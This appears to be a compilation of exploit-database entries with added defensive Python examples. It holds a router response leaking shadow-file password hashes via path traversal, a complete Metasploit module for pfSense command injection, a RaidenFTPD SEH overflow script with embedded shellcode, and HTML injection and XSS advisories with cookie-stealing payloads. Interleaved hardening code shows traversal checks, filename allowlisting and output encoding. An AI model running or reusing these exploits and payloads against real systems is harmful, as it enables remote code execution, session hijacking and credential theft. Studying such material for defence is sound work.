HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
Content-Type: text/html

<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-WR740N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.0.1";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::
```
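How an embedded web server should handle the request above, as an added example in Python (not TP-Link firmware code): percent-decode the path, refuse any `..` component outright, and confirm the joined path is still under the document root before touching the filesystem. The document root `/www`, the client address 192.168.0.50 and the access-log lines are constructed for the example; the second function runs the same check over those lines to flag traversal attempts, which deserve the most attention when the recorded status is 200.

```python
"""Path containment check plus a small access-log detector (added example)."""
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/www"  # assumed document root, constructed for the example


def contains_traversal(request_path: str) -> bool:
    """True if any path component is '..' after decoding (covers %2e%2e and backslashes)."""
    decoded = unquote(request_path.split("?", 1)[0])
    return ".." in decoded.replace("\\", "/").split("/")


def resolve_under_root(request_path: str, root: str = WEB_ROOT):
    """Absolute filesystem path for request_path, or None if it must be refused.

    Decoding happens before normalization, and the containment check runs on the
    normalized result, never on the raw string. posixpath keeps the check purely
    lexical, so it behaves the same on any host and never consults the real disk.
    """
    if contains_traversal(request_path):
        return None
    decoded = unquote(request_path.split("?", 1)[0])
    normalized = posixpath.normpath("/" + decoded.lstrip("/"))
    root = root.rstrip("/")
    candidate = posixpath.normpath(root + normalized)
    # Defence in depth: even with '..' refused, confirm the result stays under root.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed access-log lines (common log format) for the detector.
ACCESS_LOG = """\
192.168.0.50 - admin [13/Jul/2023:10:01:02 +0000] "GET /help/index.htm HTTP/1.1" 200 1843
192.168.0.50 - admin [13/Jul/2023:10:01:09 +0000] "GET /help/../../../etc/shadow HTTP/1.1" 200 912
192.168.0.77 - - [13/Jul/2023:10:02:30 +0000] "GET /dynaform/css_help.css HTTP/1.1" 200 2211
192.168.0.50 - admin [13/Jul/2023:10:03:14 +0000] "GET /help/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1020
"""

_REQ = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def find_traversal_attempts(log_text: str) -> list[dict]:
    """Return one record per request whose path carries a '..' component."""
    hits = []
    for line in log_text.splitlines():
        m = _REQ.match(line)
        if m and contains_traversal(m["path"]):
            hits.append({"src": m["src"], "user": m["user"],
                         "path": m["path"], "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for p in ("/help/index.htm", "/help/../../../etc/shadow", "/help/%2e%2e/%2e%2e/etc/shadow"):
        print(p, "->", resolve_under_root(p))
    for hit in find_traversal_attempts(ACCESS_LOG):
        print("traversal attempt:", hit)
```

Refusing `..` explicitly, rather than only normalizing, is deliberate: a normalized request never needs a `..` component, so its presence is a reliable signal to log, and the normalization step alone would silently map `/help/../../../etc/shadow` to `/www/etc/shadow` without telling anyone an attack was tried.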

pfSense v2.7.0 - OS Command Injection

```ruby
# Exploit Title: pfSense v2.7.0 - OS Command Injection
# Exploit Author: Emir Polat
# CVE-ID : CVE-2023-27253

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'pfSense Restore RRD Data Command Injection',
        'Description' => %q{
          This module exploits an authenticated command injection vulnerability in the
          "restore_rrddata()" function of pfSense prior to version 2.7.0 which allows an
          authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore" privilege
          to execute arbitrary operating system commands as the "root" user.
          This module has been tested successfully on version 2.6.0-RELEASE.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Emir Polat', # vulnerability discovery & metasploit module
        ],
        'References' => [
          ['CVE', '2023-27253'],
          ['URL', 'https://redmine.pfsense.org/issues/13935'],
          ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94']
        ],
        'DisclosureDate' => '2023-03-18',
        'Platform' => ['unix'],
        'Arch' => [ ARCH_CMD ],
        'Privileged' => true,
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'Payload' => {
          'BadChars' => "\x2F\x27",
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic netcat'
          }
        },
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
        }
      )
    )

    register_options [
      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])
    ]
  end

  def check
    unless login
      return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!")
    end

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
      'method' => 'GET',
      'keep_cookies' => true
    )

    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    unless res&.body&.include?('Diagnostics: ')
      return Exploit::CheckCode::Safe('Vulnerable module not reachable')
    end

    version = detect_version
    unless version
      return Exploit::CheckCode::Detected('Unable to get the pfSense version')
    end

    unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE')
      return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected")
    end

    Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!")
  end

  def login
    # Skip the login process if we are already logged in.
    return true if @logged_in

    csrf = get_csrf('index.php', 'GET')
    unless csrf
      print_error('Could not get the expected CSRF token for index.php when attempting login!')
      return false
    end

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'POST',
      'vars_post' => {
        '__csrf_magic' => csrf,
        'usernamefld' => datastore['USERNAME'],
        'passwordfld' => datastore['PASSWORD'],
        'login' => ''
      },
      'keep_cookies' => true
    )

    if res && res.code == 302
      @logged_in = true
      true
    else
      false
    end
  end

  def detect_version
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'GET',
      'keep_cookies' => true
    )

    # If the response isn't a 200 ok response or is an empty response, just return nil.
    unless res && res.code == 200 && res.body
      return nil
    end

    if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil?
      nil
    else
      version
    end
  end

  def get_csrf(uri, methods)
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, uri),
      'method' => methods,
      'keep_cookies' => true
    )

    unless res && res.body
      return nil # If no response was returned or an empty response was returned, then return nil.
    end

    # Try regex match the response body and save the match into a variable named csrf.
    if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil?
      return nil # No match could be found, so the variable csrf won't be defined.
    else
      return csrf
    end
  end

  def drop_config
    csrf = get_csrf('diag_backup.php', 'GET')
    unless csrf
      fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!')
    end

    post_data = Rex::MIME::Message.new
    post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
    post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
    post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"')
    post_data.add_part('', nil, nil, 'form-data; name="restorearea"')
    post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"')
    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'data' => post_data.to_s,
      'keep_cookies' => true
    )

    if res && res.code == 200 && res.body =~ /<rrddatafile>/
      return res.body
    else
      return nil
    end
  end

  def exploit
    unless login
      fail_with(Failure::NoAccess, 'Could not obtain the login cookies!')
    end

    csrf = get_csrf('diag_backup.php', 'GET')
    unless csrf
      fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!')
    end

    config_data = drop_config
    if config_data.nil?
      fail_with(Failure::UnexpectedReply, 'The drop config response was empty!')
    end

    if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil?
      fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!')
    end

    config_data.gsub!(' ', '${IFS}')
    send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")

    post_data = Rex::MIME::Message.new
    post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
    post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
    post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"')
    post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"')
    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
    post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"')
    post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")
    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
    post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"')

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'data' => post_data.to_s,
      'keep_cookies' => true
    )

    if res
      print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.")
    end
  end
end
```
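The injection above works because a `<filename>` value taken from the uploaded RRD backup XML ends up inside a shell command string, so a quote and a separator in the name are interpreted by the shell (the module even rewrites spaces as `${IFS}` to survive tokenization). The hardening pattern below is an added example in Python, not pfSense's PHP code or its actual fix (that is the commit referenced in the module): each name is validated against a strict allowlist, confined to the RRD directory, and handed to the restore tool as an argv list, never through a shell. The directory `/var/db/rrd`, the `rrdtool restore <xml> <rrd>` invocation, the shared dump path and the two sample backup documents are assumptions constructed for the example.

```python
"""Hardened handling of RRD file names from an uploaded backup (added example)."""
import posixpath
import re
import subprocess
import xml.etree.ElementTree as ET

RRD_DIR = "/var/db/rrd"  # assumed destination directory, constructed for the example

# A legitimate RRD name is letters, digits, '-' or '_' followed by '.rrd'; quotes,
# spaces, separators and shell metacharacters cannot pass this pattern.
SAFE_RRD_NAME = re.compile(r"[A-Za-z0-9_-]+\.rrd")


class UnsafeFilename(ValueError):
    """Raised for any name that fails validation."""


def validated_rrd_path(filename: str) -> str:
    """Absolute path under RRD_DIR for filename, or raise UnsafeFilename."""
    if not SAFE_RRD_NAME.fullmatch(filename):
        raise UnsafeFilename(f"rejected RRD file name: {filename!r}")
    path = posixpath.normpath(posixpath.join(RRD_DIR, filename))
    # Defence in depth: the regex already excludes '/', but re-check containment.
    if posixpath.dirname(path) != RRD_DIR:
        raise UnsafeFilename(f"escapes {RRD_DIR}: {filename!r}")
    return path


def is_safe_rrd_name(filename: str) -> bool:
    try:
        validated_rrd_path(filename)
        return True
    except UnsafeFilename:
        return False


def restore_command(filename: str, xml_dump_path: str) -> list[str]:
    """argv for the assumed 'rrdtool restore <xml> <rrd>' invocation, never a shell string."""
    return ["rrdtool", "restore", xml_dump_path, validated_rrd_path(filename)]


def filenames_from_backup(xml_text: str) -> list[str]:
    """Every <filename> value in an rrddata backup document, untrusted as received."""
    root = ET.fromstring(xml_text)
    return [(el.text or "") for el in root.iter("filename")]


def plan_restore(xml_text: str, xml_dump_path: str) -> tuple[list[list[str]], list[str]]:
    """Split the backup's names into commands to run and names that were rejected."""
    commands, rejected = [], []
    for name in filenames_from_backup(xml_text):
        if is_safe_rrd_name(name):
            commands.append(restore_command(name, xml_dump_path))
        else:
            rejected.append(name)
    return commands, rejected


def run_restore(xml_text: str, xml_dump_path: str) -> list[str]:
    """Execute the planned commands with shell=False; returns rejected names for logging."""
    commands, rejected = plan_restore(xml_text, xml_dump_path)
    for argv in commands:
        subprocess.run(argv, check=True)  # no shell: argv elements are never re-parsed
    return rejected


# Constructed sample backups: one benign, one carrying the injection pattern.
BENIGN_BACKUP = ("<rrddata><rrddatafile><filename>WAN_DHCP-quality.rrd</filename>"
                 "</rrddatafile></rrddata>")
HOSTILE_BACKUP = ("<rrddata><rrddatafile><filename>WAN_DHCP-quality.rrd';echo injected;</filename>"
                  "</rrddatafile></rrddata>")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_BACKUP), ("hostile", HOSTILE_BACKUP)):
        print(label, "->", plan_restore(doc, "/tmp/rrd-dump.xml"))
```

The allowlist regex is the primary control and the argv list is the second: even if a future change relaxed the pattern, `subprocess.run` without `shell=True` passes each element as one argument, so a `'` or `;` inside a name reaches `rrdtool` as literal text rather than the shell. Rejected names are returned so the caller can log them as an indicator of a tampered backup.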

Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

# Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2278

Release Date:
=============
2023-07-04

Vulnerability Laboratory ID (VL-ID):
====================================
2278

Common Vulnerability Scoring System:
====================================
5.4

Product & Service Introduction:
===============================
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.

Affected Product(s):
====================
ActiveITzone
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-08-20: Researcher Notification & Coordination (Security Researcher)
2021-08-21: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple persistent html injection web vulnerabilities have been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application. The vulnerabilities allow remote attackers to inject their own html code with a persistent attack vector and so manipulate application content.

The persistent html injection vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding modules. Remote attackers with accountant privileges are able to inject their own malicious script code via the name parameter, which is then rendered persistently on the profile view and on the products preview listing. Three privilege levels can access the backend: accountant (low privileges), manager (medium privileges) and admin (high privileges). Accountants can therefore attack the higher-privileged admin and manager roles, whose browsers render the injected elements when they preview the affected backend pages, and compromise the application. The request method used to inject is POST and the attack vector is persistent, located on the application side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Manage Details

Vulnerable Parameter(s):
[+] name
[+] phone
[+] address

Affected Module(s):
[+] manage profile
[+] products branding

Proof of Concept (PoC):
=======================
The html injection web vulnerabilities can be exploited by remote attackers with accountant privileges and low user interaction. For security demonstration or to reproduce the persistent web vulnerability, follow the provided information and steps below.

Exploitation: Payload
<img src="https://[DOMAIN]/[PATH]/[PICTURE].*">

Vulnerable Source: manage_admin & branding

```html
<div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">
<div class="panel-heading">
<h3 class="panel-title">Manage Details</h3>
</div>
<form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8">
<div class="panel-body">
<div class="form-group">
<label class="col-sm-3 control-label" for="demo-hor-1">Name</label>
<div class="col-sm-6">
<input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">
</div></div>
<div class="form-group">
<label class="col-sm-3 control-label" for="demo-hor-2">Email</label>
<div class="col-sm-6">
<input type="email" name="email" value="accountant@shop.com" id="demo-hor-2" class="form-control required">
</div></div>
<div class="form-group">
<label class="col-sm-3 control-label" for="demo-hor-3"> Phone</label>
<div class="col-sm-6">
<input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">
</div></div>
```

--- PoC Session Logs (POST) ---

```http
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/
Host: assm_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680
Content-Length: 902
Origin: https://assm_cms.localhost:8080
Connection: keep-alive
Referer: https://assm_cms.localhost:8080/shop/admin/manage_admin/
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly
https://assm_cms.localhost:8080/shop/admin/manage_admin/
Host: assm_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
```

Reference(s):
https://assm_cms.localhost:8080/shop/
https://assm_cms.localhost:8080/shop/admin/
https://assm_cms.localhost:8080/shop/admin/manage_admin/
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/

Solution - Fix & Patch:
=======================
Disallow insertion of html code in input fields such as name, address and phone. Sanitize the content before it is delivered to the browser.

Security Risk:
==============
The security risk of the html injection web vulnerabilities in the shopping web-application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)

```python
# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
# Date: 18/07/2023
# Exploit Author: Andre Nogueira
# Vendor Homepage: https://www.raidenftpd.com/en/
# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
# Version: RaidenFTPD 2.4.4005
# Tested on: Microsoft Windows 10 Build 19045

# 1.- Open RaidenFTPD
# 2.- Click on 'Setup' -> 'Step by step setup wizard'
# 3.- Run python code: exploit-raidenftpd.py
# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
# 5.- Click 'next' -> 'next' -> 'ok'
# 6.- Pop calc.exe

#!/usr/bin/env python3
from struct import pack

crash = 2000   # total length that triggers the crash
offset = 497   # bytes before the SEH record is overwritten

# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d"
shellcode = b"\x90" * 8
shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"
shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"
shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"
shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"
shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"
shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"
shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"
shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"
shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"
shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"
shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"
shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"
shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"
shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"
shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"
shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"
shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"
shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"
shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"

nSEH = b"\xeb\x06\x90\x90"        # jmp short +6: lands 8 bytes past the start of nSEH, in the shellcode
SEH = pack("<L", 0x7c1e76ff)      # pop eax; pop esi; ret; => msvcp70.dll

buffer = b"A" * offset
buffer += nSEH
buffer += SEH
buffer += shellcode
buffer += b"D" * (crash - len(buffer))

with open("exploit-raiden.txt", "wb") as file_payload:
    print("[*] Creating the .txt file for our payload")
    file_payload.write(buffer)
    print("[*] Writing malicious payload to the .txt file")
```

PaulPrinting CMS - (Search Delivery) Cross Site Scripting

Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2286

Release Date:
=============
2023-07-17

Vulnerability Laboratory ID (VL-ID):
====================================
2286

Common Vulnerability Scoring System:
====================================
5.2

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.
(Copy of the Homepage: https://codecanyon.net/user/codepaul)

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site scripting vulnerability in the PaulPrinting (v2018) cms web-application.

Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Open Authentication (Anonymous Privileges)

User Interaction:
=================
Medium User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application. Remote attackers are able to manipulate client-side requests by injecting malicious script code to compromise user session data.

The client-side cross site scripting vulnerability is located in the search input field: the insecurely validated q parameter affects the delivery module. Remote attackers are able to inject their own malicious script code into the search input to provoke client-side script execution, because the value is reflected without secure encoding. The request method is GET and the attack vector is non-persistent.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /account/delivery

Vulnerable Input(s):
[+] Search

Vulnerable Parameter(s):
[+] q

Affected Module(s):
[+] /account/delivery
[+] Delivery Contacts

Proof of Concept (PoC):
=======================
The non-persistent xss web vulnerability can be exploited by remote attackers with a low privileged user account and medium user interaction. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.

PoC: Example
https://codeawesome.in/printing/account/delivery?q=

PoC: Exploitation
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>

--- PoC Session Logs (GET) ---

```http
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>
Host: codeawesome.in
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;
-
GET: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
```

Vulnerable Source: (Search - delivery?q=)

```html
<div class="col-lg-8">
<a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right">
<i class="fa fa-fw fa-plus"></i>
</a>
<form class="form-inline mt-4 mb-2" method="get">
<div class="input-group mb-3 mr-2">
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">">
<div class="input-group-append">
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button>
</div></div>
```

Security Risk:
==============
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
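Both Vulnerability-Lab advisories on this page (the stored HTML injection in Active Super Shop's name, phone and address fields above, and the reflected XSS in PaulPrinting's `q` parameter here) have the same root cause: a user-controlled value is written into a double-quoted HTML attribute without encoding, so `">` closes the attribute and the following `<img>` or `<iframe>` becomes live markup. The code below is an added example, not either vendor's code. It shows the vulnerable rendering beside the encoded one, adds an input-side check for the profile form, and uses the two payloads quoted in the advisories as constructed sample inputs; the form layouts and the phone pattern are assumptions.

```python
"""Context-aware output encoding for user-controlled values (added example)."""
import html
import re


def attr(value: str) -> str:
    """Encode for a double-quoted attribute value: & < > " ' are all replaced."""
    return html.escape(value, quote=True)


def text(value: str) -> str:
    """Encode for an HTML text node (quotes need no escaping there)."""
    return html.escape(value, quote=False)


def render_search_box_vulnerable(q: str) -> str:
    """The pattern in the advisory: the raw parameter is interpolated into value=""."""
    return f'<input type="text" class="form-control" name="q" value="{q}">'


def render_search_box(q: str) -> str:
    """Same markup, with the value encoded for the attribute context."""
    return f'<input type="text" class="form-control" name="q" value="{attr(q)}">'


# Assumed phone format: digits, spaces, +, parentheses and dashes only.
PHONE_RE = re.compile(r"^\+?[0-9 ()-]{3,20}$")


def validate_profile(name: str, phone: str, address: str) -> dict:
    """Input-side checks for the profile form (defence in depth, not a replacement
    for output encoding): reject angle brackets in a name, accept only phone-shaped
    strings, cap the free-text address. Returns a field -> message dict of errors."""
    errors = {}
    if "<" in name or ">" in name or not (1 <= len(name.strip()) <= 80):
        errors["name"] = "name may not contain < or > and must be 1-80 characters"
    if not PHONE_RE.match(phone):
        errors["phone"] = "phone may contain only digits, spaces, +, (, ) and -"
    if len(address) > 200:
        errors["address"] = "address too long"
    return errors


def render_profile(name: str, phone: str, address: str) -> str:
    """Stored values rendered back into the Manage Details form, each in its context."""
    return (
        f'<input type="text" name="name" value="{attr(name)}">'
        f'<input type="text" name="phone" value="{attr(phone)}">'
        f'<p class="address">{text(address)}</p>'
    )


def count_tags(markup: str, tag: str) -> int:
    """Number of real start tags for `tag` in markup (encoded text does not count)."""
    return len(re.findall(rf"<{tag}\b", markup, re.IGNORECASE))


# Payloads quoted in the two advisories, constructed here as sample inputs.
XSS_Q = 'a"><iframe src=evil.source onload=alert(document.cookie)>'
HTMLI_NAME = 'Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">'

if __name__ == "__main__":
    print("vulnerable:", render_search_box_vulnerable(XSS_Q))
    print("encoded:   ", render_search_box(XSS_Q))
    print("profile:   ", render_profile(HTMLI_NAME, "017", "1 Main St"))
    print("errors:    ", validate_profile(HTMLI_NAME, "017", "1 Main St"))
```

The encoding function is chosen by where the value lands, not by what the value contains: `attr()` for attribute values, `text()` for element bodies. Input validation is kept separate because a name such as `O'Brien & Sons` is legitimate and must still render safely, which only output encoding guarantees.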